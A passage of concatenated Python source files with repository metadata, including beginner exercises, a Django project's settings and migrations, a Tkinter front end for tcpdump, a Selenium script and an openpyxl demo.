    input_seq_length = 5  # Maximum length of the input sequence
    qk_shape = (batch_size, input_seq_length, d_k)
    queries = np.random.random(qk_shape)
    keys = np.random.random(qk_shape)
    values = np.random.random((batch_size, input_seq_length, d_v))
    attention = DotProductAttention()
    print(attention(queries, keys, values, d_k))
if __name__ == '__main__':
test()
| [
"ssruoz@gmail.com"
] | ssruoz@gmail.com |
debf8eb20dcdf7314e802ca1575b3fa5315ac73b | 5674a52ee8a3e6abfb02baef223a4e48e8e379bd | /st_app.py | b4d89fa6df1a56bf48d6227bcf2ec03443a61399 | [] | no_license | student1304/cryptoquote | ebd439ddd6fd3e9f2eca1d47b41f6b98031290b0 | b3794701b3a39fcb653cc023d875c875f0eec21b | refs/heads/master | 2023-01-20T03:56:00.922458 | 2020-11-27T17:24:25 | 2020-11-27T17:24:25 | 316,559,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 462 | py | import streamlit as st
from cryptoquote import encrypt
st.title('Cryptoquote by Alex')
st.write('Please enter a quote which you want to turn into a cryptoquote game')
quote = st.text_area('Enter or paste your quote here:')
encrpyted = encrypt(quote)
st.write('Your game begins:')
st.markdown(f'**{encrpyted}**')
st.text('---------------------------------------------------------------')
st.text("To print just use use browser's print function or press CTRL-P") | [
"student1304@online.de"
] | student1304@online.de |
be0f894d955a7f808f25605b1110a6f45b61ddff | a67781ba3d5a093f9d38fa5a823a31600a142ad0 | /LeetCode/DataStructure/BinaryTree/MaxDepth_Rec_BottomUp.py | f3b6760b9306a35e13ef65997074bcc2fb50d7ea | [
"MIT"
] | permissive | hooyao/Coding-Py3 | 0166a67263a5351b3c85540d75c4f155ff3f558d | f462b66ae849f4332a4b150f206dd49c7519e83b | refs/heads/master | 2021-04-15T09:45:35.230859 | 2019-06-22T07:24:22 | 2019-06-22T07:24:22 | 126,565,644 | 0 | 0 | MIT | 2019-12-02T01:44:14 | 2018-03-24T04:29:50 | Python | UTF-8 | Python | false | false | 1,007 | py | import sys
from BTreeUtils import BTreeHelper
from BTreeUtils import TreeNode
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    """LeetCode 104 - maximum depth of a binary tree, bottom-up recursion."""

    def maxDepth(self, root):
        """Return the maximum depth of a binary tree.

        :type root: TreeNode (any object with .left/.right attributes)
        :rtype: int
        """
        # recursive_bottom_up already returns 0 for an empty tree, so the
        # duplicate None guard the original carried here is unnecessary.
        return self.recursive_bottom_up(root)

    def recursive_bottom_up(self, root):
        """Post-order recursion: a node's depth is 1 + its deeper subtree."""
        if root is None:
            return 0
        left_depth = self.recursive_bottom_up(root.left)
        right_depth = self.recursive_bottom_up(root.right)
        return max(left_depth, right_depth) + 1
def main(*args):
    # Build the sample tree [3, 9, 20, None, None, 15, 7] from the LeetCode
    # example, pretty-print it, and report its maximum depth (expected: 3).
    tree_array = [3, 9, 20, None, None, 15, 7]
    root = BTreeHelper.list_to_tree(tree_array)
    BTreeHelper.pretty_print(root)
    result = Solution().maxDepth(root)
    print(result)
if __name__ == '__main__':
main(*sys.argv[1:])
| [
"hooyao@gmail.com"
] | hooyao@gmail.com |
5d2be0a0fb70fa8c5e5cc20312f86901bd3ba25c | 7c3929a55b39be0dbe12856e61e4ecb31ad20378 | /Algo/less5/task_1.py | cf987d78127e385a119733c3142b67409cc612b1 | [] | no_license | ElenaAn12/GBLearning | 01f3a1d34e86150e2defb31153dbd0611d7eeefe | 40d13fae34dccbf7246a7991c45df0e1abfa62a0 | refs/heads/master | 2022-07-06T21:01:35.598574 | 2020-05-17T09:43:02 | 2020-05-17T09:43:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,599 | py | """
1. Пользователь вводит данные о количестве предприятий, их наименования и прибыль
за 4 квартала (т.е. 4 отдельных числа) для каждого предприятия.
Программа должна определить среднюю прибыль (за год для всех предприятий)
и вывести наименования предприятий, чья прибыль выше среднего и отдельно
вывести наименования предприятий, чья прибыль ниже среднего.
Подсказка:
Для решения задачи обязательно примените какую-нибудь коллекцию из модуля collections
Для лучшее освоения материала можете даже сделать несколько решений этого задания,
применив несколько коллекций из модуля collections
Пример:
Введите количество предприятий для расчета прибыли: 2
Введите название предприятия: Рога
через пробел введите прибыль данного предприятия
за каждый квартал(Всего 4 квартала): 235 345634 55 235
Введите название предприятия: Копыта
через пробел введите прибыль данного предприятия
за каждый квартал(Всего 4 квартала): 345 34 543 34
Средняя годовая прибыль всех предприятий: 173557.5
Предприятия, с прибылью выше среднего значения: Рога
Предприятия, с прибылью ниже среднего значения: Копыта
"""
from collections import Counter
from statistics import mean

# Interactive console program (prompts are in Russian): read a number of
# companies and four quarterly profits each, then report which companies
# are above/below the average yearly profit.

# Keep prompting until a valid integer company count is entered.
while True:
    try:
        company_count = int(input('Введите количество предприятий: '))
        break
    except ValueError:
        print('Введенное значение не является числом!')

# Counter maps company name -> accumulated yearly profit.
company_rating = Counter()

for i in range(1, company_count + 1):
    company_name = input(f'Введите название предприятия № {i}: ')
    # Re-prompt until at least four integer quarterly figures are supplied.
    while True:
        try:
            quarter_profit = input('Введите прибыль предприятия за каждый квартал через пробел: ').split()
            if len(quarter_profit) < 4:
                raise ValueError
            company_profit = [int(elem) for elem in quarter_profit]
            break
        except ValueError:
            print('Вы подали доход не за все отчетные периоды или предоставлили неверные данные!')
    # Accumulate the company's yearly total quarter by quarter.
    for elem in company_profit:
        company_rating[company_name] += elem

# Average yearly profit across all companies.
company_avg_profit = mean(company_rating.values())
print(f'Средняя годовая прибыль всех предприятий: {company_avg_profit}')
# Partition companies around the average (exactly-average goes to "upper").
lower_profit, upper_profit = [], []
for key, val in company_rating.items():
    lower_profit.append(key) if val < company_avg_profit else upper_profit.append(key)
print(f'Предприятия с прибылью выше среднего значения: {" ".join(upper_profit)}')
print(f'Предприятия с прибылью ниже среднего значения: {" ".join(lower_profit)}')
| [
"cronos1009@yandex.ru"
] | cronos1009@yandex.ru |
6f1f21782fa25c1e0c733ab8bf19c1b0653e4f1a | b76c6813f2ce2fd24a33175a0249cd9544583fe7 | /blog/migrations/0035_auto_20200603_1114.py | 873a1f8a79a322df963468181144adc5403b8b8e | [] | no_license | adrianglez2203/nuevo_as | 0074e6d8155a471bb7d81bc3456914acdc7fba98 | df375410e9d6922ebb931645ff8f1c7b3f5cb93b | refs/heads/master | 2022-08-01T23:43:51.328124 | 2020-06-06T15:35:23 | 2020-06-06T15:35:23 | 270,111,577 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 534 | py | # Generated by Django 3.0.6 on 2020-06-03 15:14
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
    # Auto-generated migration: alters Post.published on the blog app.

    dependencies = [
        ('blog', '0034_auto_20200603_1112'),
    ]

    operations = [
        migrations.AlterField(
            model_name='post',
            name='published',
            # NOTE(review): this default is a fixed timestamp frozen at the
            # moment makemigrations ran; the model probably intended a
            # callable such as timezone.now - confirm against blog/models.py.
            field=models.DateTimeField(default=datetime.datetime(2020, 6, 3, 15, 14, 3, 700736, tzinfo=utc), verbose_name='Fecha de Publicacion'),
        ),
    ]
| [
"adrianglez2203@gmail.com"
] | adrianglez2203@gmail.com |
4f599928dcbe084ccabaf12fc95e50b9adde750b | 30ebffdf55185e26577325d8a577db030b57a695 | /mysite/Cars/migrations/0001_initial.py | 0ff669ceb53824b0a51f7115082c7d28968cbea7 | [] | no_license | JabbarMurad/django_jm | 3de1630ee0d4127e0fa54a6f09a15d1b00b36cdd | 0cbfeaad16f59bbc61820ffc981e0de3441f06c6 | refs/heads/master | 2023-02-03T22:55:45.280691 | 2020-12-22T11:06:22 | 2020-12-22T11:06:22 | 323,609,391 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 623 | py | # Generated by Django 3.1.4 on 2020-12-21 09:36
from django.db import migrations, models
class Migration(migrations.Migration):
    # Initial migration for the Cars app: creates the Specs table.

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Specs',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=20)),
                # Price with two decimal places, up to 999,999.99.
                ('price', models.DecimalField(decimal_places=2, max_digits=8)),
                ('weight', models.PositiveIntegerField()),
            ],
        ),
    ]
| [
"IDRAK@ws0113.corp.idrak.az"
] | IDRAK@ws0113.corp.idrak.az |
9903b6cb1114f4fd84facf1b3807dca171725ee3 | 8b53eaac440ed565748698f8dc9f69a2d8f68a16 | /projeto/settings.py | d93691129f1d353dfcd38c2bfee5e061f3f6ecc6 | [] | no_license | kelver-web/projeto-django | eb0a9ecd07a1708a52bc377d74f485839773c13b | dba4fde3d2a8fb7a1d315163447c1764adde4bc0 | refs/heads/master | 2023-06-08T21:05:41.178115 | 2021-06-24T21:19:51 | 2021-06-24T21:19:51 | 369,625,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,299 | py | """
Django settings for projeto project.
Generated by 'django-admin startproject' using Django 3.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path

import os

# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent


# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-)s%)591he1_l)2l=ciqgpz)rgyu)ie0-h6ilzp3!6^jiqgypx%'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = []


# Application definition
# 'core' is the project's single local app.

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'core',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'projeto.urls'

# Templates are looked up both in the project-level 'templates' dir and in
# each app's own templates directory (APP_DIRS=True).
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'projeto.wsgi.application'


# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
# Development default: file-based SQLite next to manage.py.

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': BASE_DIR / 'db.sqlite3',
    }
}


# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]


# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True


# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/

STATIC_URL = '/static/'

# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field

DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
"kelverwt@gmail.com"
] | kelverwt@gmail.com |
303f90ad9c974b79b7ade8db79e26bb8c6485dd5 | 29b6631380f6d5a0543d0a303b7e610a1594e0c5 | /main.py | 9ae61fcc5e08c90006321053713df4d1603363fc | [] | no_license | citrica/players | aa54c9e02eeb2d26c01b6ff05d105379ad86774a | d3902443b07fc5f51dc9a7136603a628670d3044 | refs/heads/master | 2020-09-15T22:34:13.796563 | 2019-11-23T10:39:04 | 2019-11-23T10:39:04 | 223,571,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,816 | py | class Player():
def __init__(self, first_name, last_name, height_cm, weight_kg):
self.first_name = first_name
self.last_name = last_name
self.height_cm = height_cm
self.weight_kg = weight_kg
def weight_to_lbs(self):
pounds = self.weight_kg * 2.20462262
return pounds
class BasketballPlayer(Player):
    """Player specialised with basketball box-score statistics."""

    def __init__(self, first_name, last_name, height_cm, weight_kg,
                 points, rebounds, assists):
        # Physical attributes are handled entirely by the base class.
        super().__init__(first_name=first_name, last_name=last_name,
                         height_cm=height_cm, weight_kg=weight_kg)
        # Basketball-specific statistics.
        self.points = points
        self.rebounds = rebounds
        self.assists = assists
class FootballPlayer(Player):
    """Player specialised with football match statistics."""

    def __init__(self, first_name, last_name, height_cm, weight_kg,
                 goals, yellow_cards, red_cards):
        # Physical attributes are handled entirely by the base class.
        super().__init__(first_name=first_name, last_name=last_name,
                         height_cm=height_cm, weight_kg=weight_kg)
        # Football-specific statistics.
        self.goals = goals
        self.yellow_cards = yellow_cards
        self.red_cards = red_cards
# Interactive demo: collect one football and one basketball player from the
# console, persist each as a plain-dict string, then echo both.

print("Enter a football player's data!! ")
fName = input("Enter a player name: ")
fLastName = input("Enter last name: ")
fHeight = input("Enter height: ")
fWeight = input("Enter weight: ")
goals = input("Enter goals: ")
yellowCards = input("Enter yellow cards: ")
redCards = input("Enter red cards: ")

print("Enter a basketboll player's data!! ")
bName = input("Enter a player name: ")
bLastName = input("Enter last name: ")
bHeight = input("Enter height: ")
bWeight = input("Enter weight: ")
points = input("Enter points: ")
rebounds = input("Enter rebounds: ")
assists = input("Enter assists: ")

# Numeric fields are converted here; invalid input raises ValueError.
new_player_football = FootballPlayer(first_name=fName,
                                     last_name=fLastName,
                                     height_cm=float(fHeight),
                                     weight_kg=float(fWeight),
                                     goals=int(goals),
                                     yellow_cards=int(yellowCards),
                                     red_cards=int(redCards))

new_player_basket = BasketballPlayer(first_name=bName,
                                     last_name=bLastName,
                                     height_cm=float(bHeight),
                                     weight_kg=float(bWeight),
                                     points=int(points),
                                     rebounds=int(rebounds),
                                     assists=int(assists))

# Mode "w" overwrites any previous run's file.
with open("football_players.txt", "w") as football_file:
    football_file.write(str(new_player_football.__dict__))

with open("basket_players.txt", "w") as basket_file:
    basket_file.write(str(new_player_basket.__dict__))

print("Football player's data: " + str(new_player_football.__dict__))
print("Basketball player's data: " + str(new_player_basket.__dict__))
| [
"inma.rueda28@gmail.com"
] | inma.rueda28@gmail.com |
d490050414ca89df702b722da8dc2bdba1855034 | a2b5061255a53e3cf6ff561cd1d8fc5e3d54427c | /tcpdump.py.bak1 | 0f4aedf6337fa0b19035c2f431080ad89735c396 | [] | no_license | G1-10ST/NetworkGuard | 3f07a274236519aceeecc83ac64f2232d8820f25 | b88b058b2e502d23e0c768cd0b5318cbc3703939 | refs/heads/master | 2020-09-12T07:51:47.687043 | 2019-11-21T19:32:24 | 2019-11-21T19:32:24 | 222,360,538 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,275 | bak1 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# GUI module generated by PAGE version 4.26
# in conjunction with Tcl version 8.6
# Nov 18, 2019 06:43:42 AM IST platform: Linux
import sys
import re
import subprocess
try:
import Tkinter as tk
except ImportError:
import tkinter as tk
try:
import ttk
py3 = False
except ImportError:
import tkinter.ttk as ttk
py3 = True
import tcpdump_support
def vp_start_gui():
    '''Starting point when module is the main routine.'''
    # Creates the Tk root, builds the Toplevel1 window on it, lets the
    # support module initialise, then enters the Tk event loop (blocks).
    global val, w, root
    root = tk.Tk()
    top = Toplevel1 (root)
    tcpdump_support.init(root, top)
    root.mainloop()
w = None
def create_Toplevel1(root, *args, **kwargs):
    '''Starting point when module is imported by another program.'''
    # Builds the window as a child Toplevel of the caller's root instead of
    # owning the mainloop; returns both the widget and its controller.
    global w, w_win, rt
    rt = root
    w = tk.Toplevel (root)
    top = Toplevel1 (w)
    tcpdump_support.init(w, top, *args, **kwargs)
    return (w, top)
def destroy_Toplevel1():
    # Tear down the window created by create_Toplevel1 and clear the
    # module-level handle so a new one can be created later.
    global w
    w.destroy()
    w = None
class Toplevel1:
    """Main TCPDump window: two action buttons and two scrolled list boxes
    showing the output of the corresponding tcpdump invocations."""

    def task1(self):
        """Run ``tcpdump -D`` and list the capture-capable interfaces in the
        left list box, one line per interface."""
        p1 = subprocess.Popen(["tcpdump", "-D"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        while True:
            txt1 = p1.stdout.readline()
            if not txt1:
                break
            # Fix: rstrip() returns a new value - the original discarded it.
            # Decode so the listbox shows text rather than a bytes object.
            txt1 = txt1.rstrip().decode(errors="replace")
            # Fix: append at the end to keep lines in output order
            # (the original inserted every line at index 1, scrambling them).
            self.Scrolledlistbox1.insert(tk.END, txt1)

    def back(self):
        """Close this window and relaunch the previous screen."""
        root.destroy()
        # NOTE(review): 'seccond.py' looks like a typo but may be the actual
        # filename of the previous screen - confirm before renaming.
        subprocess.Popen(['python3', 'seccond.py'])

    def task2(self):
        """Read packets from ``server.pcap`` (``tcpdump -nn -r``) and list
        them in the right list box."""
        p2 = subprocess.Popen(["tcpdump", "-nn", "-r", "server.pcap"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        while True:
            txt2 = p2.stdout.readline()
            if not txt2:
                break
            # Same fixes as task1: keep the stripped value, decode, append.
            txt2 = txt2.rstrip().decode(errors="replace")
            self.Scrolledlistbox2.insert(tk.END, txt2)

    def __init__(self, top=None):
        '''This class configures and populates the toplevel window.
           top is the toplevel containing window.'''
        _bgcolor = '#d9d9d9'  # X11 color: 'gray85'
        _fgcolor = '#000000'  # X11 color: 'black'
        _compcolor = '#d9d9d9'  # X11 color: 'gray85'
        _ana1color = '#d9d9d9'  # X11 color: 'gray85'
        _ana2color = '#ececec'  # Closest X11 color: 'gray92'
        font9 = "-family {Noto Sans Display} -size 14 -weight normal " \
                "-slant roman -underline 0 -overstrike 0"

        self.style = ttk.Style()
        if sys.platform == "win32":
            self.style.theme_use('winnative')
        self.style.configure('.', background=_bgcolor)
        self.style.configure('.', foreground=_fgcolor)
        self.style.map('.', background=
                       [('selected', _compcolor), ('active', _ana2color)])

        top.geometry("825x536+240+132")
        top.minsize(1, 1)
        top.maxsize(1351, 738)
        top.resizable(1, 1)
        top.title("TCPDump")
        top.configure(background="#020202")

        # Left pane: interface listing filled by task1().
        self.Scrolledlistbox1 = ScrolledListBox(top)
        self.Scrolledlistbox1.place(relx=0.036, rely=0.243, relheight=0.631,
                                    relwidth=0.407)
        self.Scrolledlistbox1.configure(background="white")
        self.Scrolledlistbox1.configure(font="TkFixedFont")
        self.Scrolledlistbox1.configure(highlightcolor="#d9d9d9")
        self.Scrolledlistbox1.configure(selectbackground="#c4c4c4")

        self.Button1 = tk.Button(top)
        self.Button1.place(relx=0.061, rely=0.112, height=40, width=300)
        self.Button1.configure(background="#000000")
        self.Button1.configure(font=font9)
        self.Button1.configure(command=self.task1)
        self.Button1.configure(foreground="#ffffff")
        self.Button1.configure(text='''Display all connected Interfaces''')

        # Right pane: packet capture output filled by task2().
        self.Scrolledlistbox2 = ScrolledListBox(top)
        self.Scrolledlistbox2.place(relx=0.473, rely=0.243, relheight=0.631,
                                    relwidth=0.504)
        self.Scrolledlistbox2.configure(background="white")
        self.Scrolledlistbox2.configure(font="TkFixedFont")
        self.Scrolledlistbox2.configure(highlightcolor="#d9d9d9")
        self.Scrolledlistbox2.configure(selectbackground="#c4c4c4")

        self.Button2 = tk.Button(top)
        self.Button2.place(relx=0.57, rely=0.112, height=40, width=293)
        self.Button2.configure(background="#000000")
        self.Button2.configure(font=font9)
        self.Button2.configure(command=self.task2)
        self.Button2.configure(foreground="#ffffff")
        self.Button2.configure(text='''Capture 10 Packets from Source''')
# The following code is added to facilitate the Scrolled widgets you specified.
class AutoScroll(object):
    '''Configure the scrollbars for a widget.

    Mixin: expects to be combined with a Tk widget class (it calls
    self.yview/self.xview/self.configure/self.grid). It attaches
    auto-hiding scrollbars and re-exports the master's geometry methods.
    '''
    def __init__(self, master):
        # Rozen. Added the try-except clauses so that this class
        # could be used for scrolled entry widget for which vertical
        # scrolling is not supported. 5/7/14.
        # NOTE(review): bare except clauses below silently swallow all
        # errors; kept as-is because some widgets lack yview support.
        try:
            vsb = ttk.Scrollbar(master, orient='vertical', command=self.yview)
        except:
            pass
        hsb = ttk.Scrollbar(master, orient='horizontal', command=self.xview)

        try:
            self.configure(yscrollcommand=self._autoscroll(vsb))
        except:
            pass
        self.configure(xscrollcommand=self._autoscroll(hsb))

        # Widget in cell (0,0); scrollbars hug the right and bottom edges.
        self.grid(column=0, row=0, sticky='nsew')
        try:
            vsb.grid(column=1, row=0, sticky='ns')
        except:
            pass
        hsb.grid(column=0, row=1, sticky='ew')

        master.grid_columnconfigure(0, weight=1)
        master.grid_rowconfigure(0, weight=1)

        # Copy geometry methods of master (taken from ScrolledText.py)
        # so callers can pack/grid/place the container via this widget.
        if py3:
            methods = tk.Pack.__dict__.keys() | tk.Grid.__dict__.keys() \
                | tk.Place.__dict__.keys()
        else:
            methods = tk.Pack.__dict__.keys() + tk.Grid.__dict__.keys() \
                + tk.Place.__dict__.keys()

        for meth in methods:
            if meth[0] != '_' and meth not in ('config', 'configure'):
                setattr(self, meth, getattr(master, meth))

    @staticmethod
    def _autoscroll(sbar):
        '''Hide and show scrollbar as needed.'''
        # Returns a callback suitable for xscrollcommand/yscrollcommand:
        # the scrollbar is hidden whenever the whole content is visible.
        def wrapped(first, last):
            first, last = float(first), float(last)
            if first <= 0 and last >= 1:
                sbar.grid_remove()
            else:
                sbar.grid()
            sbar.set(first, last)
        return wrapped

    def __str__(self):
        # Delegate to the container frame so Tk path names resolve to it.
        return str(self.master)
def _create_container(func):
    '''Creates a ttk Frame with a given master, and use this new frame to
    place the scrollbars and the widget.'''
    # Decorator for __init__: swaps the caller-supplied master for an
    # intermediate Frame and wires mouse-wheel binding on enter/leave.
    def wrapped(cls, master, **kw):
        container = ttk.Frame(master)
        container.bind('<Enter>', lambda e: _bound_to_mousewheel(e, container))
        container.bind('<Leave>', lambda e: _unbound_to_mousewheel(e, container))
        return func(cls, container, **kw)
    return wrapped
class ScrolledListBox(AutoScroll, tk.Listbox):
    '''A standard Tkinter Listbox widget with scrollbars that will
    automatically show/hide as needed.'''
    @_create_container
    def __init__(self, master, **kw):
        # 'master' here is the intermediate Frame injected by
        # _create_container, not the caller's original parent.
        tk.Listbox.__init__(self, master, **kw)
        AutoScroll.__init__(self, master)

    def size_(self):
        # Renamed wrapper around Listbox.size() (AutoScroll re-exports the
        # master Frame's geometry methods, which shadows 'size').
        sz = tk.Listbox.size(self)
        return sz
import platform
def _bound_to_mousewheel(event, widget):
    # On pointer enter, globally bind wheel events to the scrolled child.
    # Windows/macOS deliver <MouseWheel>; X11 delivers Button-4/Button-5.
    child = widget.winfo_children()[0]
    if platform.system() == 'Windows' or platform.system() == 'Darwin':
        child.bind_all('<MouseWheel>', lambda e: _on_mousewheel(e, child))
        child.bind_all('<Shift-MouseWheel>', lambda e: _on_shiftmouse(e, child))
    else:
        child.bind_all('<Button-4>', lambda e: _on_mousewheel(e, child))
        child.bind_all('<Button-5>', lambda e: _on_mousewheel(e, child))
        child.bind_all('<Shift-Button-4>', lambda e: _on_shiftmouse(e, child))
        child.bind_all('<Shift-Button-5>', lambda e: _on_shiftmouse(e, child))
def _unbound_to_mousewheel(event, widget):
    # On pointer leave, drop the global wheel bindings installed by
    # _bound_to_mousewheel so other widgets can receive wheel events.
    if platform.system() == 'Windows' or platform.system() == 'Darwin':
        widget.unbind_all('<MouseWheel>')
        widget.unbind_all('<Shift-MouseWheel>')
    else:
        widget.unbind_all('<Button-4>')
        widget.unbind_all('<Button-5>')
        widget.unbind_all('<Shift-Button-4>')
        widget.unbind_all('<Shift-Button-5>')
def _on_mousewheel(event, widget):
    # Vertical scrolling. Windows reports delta in multiples of 120,
    # macOS in small raw units; X11 reports discrete Button-4/5 clicks.
    if platform.system() == 'Windows':
        widget.yview_scroll(-1*int(event.delta/120),'units')
    elif platform.system() == 'Darwin':
        widget.yview_scroll(-1*int(event.delta),'units')
    else:
        if event.num == 4:
            widget.yview_scroll(-1, 'units')
        elif event.num == 5:
            widget.yview_scroll(1, 'units')
def _on_shiftmouse(event, widget):
    # Horizontal scrolling (Shift + wheel); same per-platform delta
    # conventions as _on_mousewheel but applied to the x axis.
    if platform.system() == 'Windows':
        widget.xview_scroll(-1*int(event.delta/120), 'units')
    elif platform.system() == 'Darwin':
        widget.xview_scroll(-1*int(event.delta), 'units')
    else:
        if event.num == 4:
            widget.xview_scroll(-1, 'units')
        elif event.num == 5:
            widget.xview_scroll(1, 'units')
if __name__ == '__main__':
vp_start_gui()
| [
"itm2017008@iiita.ac.in"
] | itm2017008@iiita.ac.in |
d687fed816f59497ad6ab2dfd2601c0db090c0b8 | 15855ce729e78fa0628d0e5a774b7fcaff7acc85 | /seleniumProject/seleniumScripts/DealWithWebelements4.py | 087a8ee8b6c0c406d1c2f9bf537ee3ee23a0ce01 | [] | no_license | nikhil-shukla/GitDemo | d8c63aec6978aed251c0a4df3c5b4aacef702735 | f060716815f9ba1025ce8fc525dd10e9ddc0b2dc | refs/heads/master | 2023-07-08T22:48:26.439978 | 2021-08-16T13:25:18 | 2021-08-16T13:25:18 | 396,787,624 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 623 | py | from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
import time
# s=Service("F:/Study/SeleniumWebDrivers/chromedriver.exe")
driver = webdriver.Chrome("F:/Study/SeleniumWebDrivers/chromedriver.exe")
driver.maximize_window()
driver.get("https://opensource-demo.orangehrmlive.com/")
l1=driver.find_elements(By.TAG_NAME, "a")
for x in l1:
print("\n")
print(x)
#forgotLink = driver.find_element(By.LINK_TEXT, "Forgot your password?")
forgotLink = driver.find_element(By.PARTIAL_LINK_TEXT, "Forgot your")
forgotLink.click()
driver.quit() | [
"nikhilshukla912@gmail.com"
] | nikhilshukla912@gmail.com |
5a784f9267f47e84390f91db1ca4a696fddfa026 | 52c2ccb6fb55126a65bff2b4b7f653e4b0805759 | /tibiawikisql/models/__init__.py | 210e3bc5e7f40f3b77dd0e2dda1538287ab80d97 | [
"Apache-2.0"
] | permissive | Galarzaa90/tibiawiki-sql | 4907236d518cdc6a53f32645efa3b22517e91f90 | 982be5ebd7905354b6c6a31c4247b2ee21bbe943 | refs/heads/master | 2022-08-09T09:18:46.533611 | 2022-07-23T13:56:07 | 2022-07-23T13:56:07 | 108,594,636 | 22 | 11 | Apache-2.0 | 2022-06-28T16:46:13 | 2017-10-27T20:52:55 | Python | UTF-8 | Python | false | false | 1,552 | py | # Copyright 2021 Allan Galarza
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains all the models representing TibiaWiki articles."""
from tibiawikisql.models.abc import Parseable, Row
from tibiawikisql.models.achievement import Achievement
from tibiawikisql.models.charm import Charm
from tibiawikisql.models.creature import Creature, CreatureAbility, CreatureDrop, CreatureMaxDamage, CreatureSound
from tibiawikisql.models.house import House
from tibiawikisql.models.imbuement import Imbuement, ImbuementMaterial
from tibiawikisql.models.item import Book, Item, ItemAttribute, ItemStoreOffer, Key
from tibiawikisql.models.mount import Mount
from tibiawikisql.models.npc import Npc, NpcBuyOffer, NpcDestination, NpcOffer, NpcSellOffer, NpcSpell, RashidPosition
from tibiawikisql.models.outfit import Outfit, OutfitImage, OutfitQuest
from tibiawikisql.models.quest import Quest, QuestDanger, QuestReward
from tibiawikisql.models.spell import Spell
from tibiawikisql.models.update import Update
from tibiawikisql.models.world import World
| [
"allan.galarza@gmail.com"
] | allan.galarza@gmail.com |
922757483f5b92750a41e5763823e5796f197e37 | 1e0baa4961b734cc5c73c01b5baa5cdff2dca1bd | /create_remove_sheet_test.py | 1fc50189c43ded1f2100894f5fa18022094f1266 | [] | no_license | mallikarjunasai995/Automate-the-Boring-Stuff-with-Python-Chapter-12-Excel | d5b690781c1e1acff99a552ab4efc005b8131272 | d8e315a90780dbbe728cdad6eda2eae380aa88b7 | refs/heads/master | 2020-08-13T18:31:59.207458 | 2016-08-30T15:17:55 | 2016-08-30T15:17:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 528 | py | import openpyxl
wb = openpyxl.Workbook()
print(wb.get_sheet_names())
print(wb.create_sheet())
print(wb.get_sheet_names())
print(wb.create_sheet(index=0, title='First Sheet'))
print(wb.get_sheet_names())
print(wb.create_sheet(index=2, title='Middle Sheet'))
print(wb.get_sheet_names())
print(wb.remove_sheet(wb.get_sheet_by_name('Middle Sheet')))
print(wb.remove_sheet(wb.get_sheet_by_name('Sheet1')))
print(wb.get_sheet_names())
sheet = wb.get_sheet_by_name('Sheet')
